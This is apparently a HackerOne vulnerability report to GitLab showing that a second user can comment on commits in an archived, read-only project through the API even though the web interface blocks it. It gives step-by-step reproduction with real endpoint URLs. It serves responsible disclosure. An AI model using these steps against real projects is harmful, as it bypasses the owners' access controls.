User Can Post Comment to Commit in Archived Project via API
HackerOne report #748209 by rafiem
on 2019-11-29, assigned to @jeremymatos:
Hi Team,
i have found improper access control on archived projects. When a project is archived, the project become read-only, this mean that user cannot write data to the project (example : comment). There is no option and not able to comment a commit via UI. But, in this case, user still able to comment to commit via API endpoint
Proof of Concept
1.) User A have project, in this case i use the project : https://gitlab.com/bambangyera/huban
2.) User A make some commit to the project
3.) User A then archived the project
4.) User B then try to GET a commit sha of project via endpoint API : https://gitlab.com/api/v4/projects/15590107/repository/commits/
5.) After getting the sha of commit, User B then able to comment the commit via POST request with parameter note
to API endpoint : https://gitlab.com/api/v4/projects/15590107/repository/commits/3edb58d71c6fd95f9fb834be1364d7cf901a02c1/comments
<>PoC video attached :
PoC.webm
Impact
Unauthorized user able to comment a commit in archived project
Best Regards,
[@]rafiem
Attachments
Warning: Attachments received through HackerOne, please exercise caution!